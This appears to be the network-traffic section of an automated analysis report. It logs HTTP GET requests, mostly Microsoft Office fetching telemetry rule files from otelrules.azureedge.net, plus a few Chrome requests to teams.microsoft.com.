Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v2/worker/precompiled-telemetry-web-worker-4be7a4934c71ca93.js HTTP/1.1Host: teams.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://teams.microsoft.com/v2/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
Source: global trafficHTTP traffic detected: GET /v2/manifest.json HTTP/1.1Host: teams.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://teams.microsoft.com/v2/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v2/worker/precompiled-telemetry-web-worker-4be7a4934c71ca93.js HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
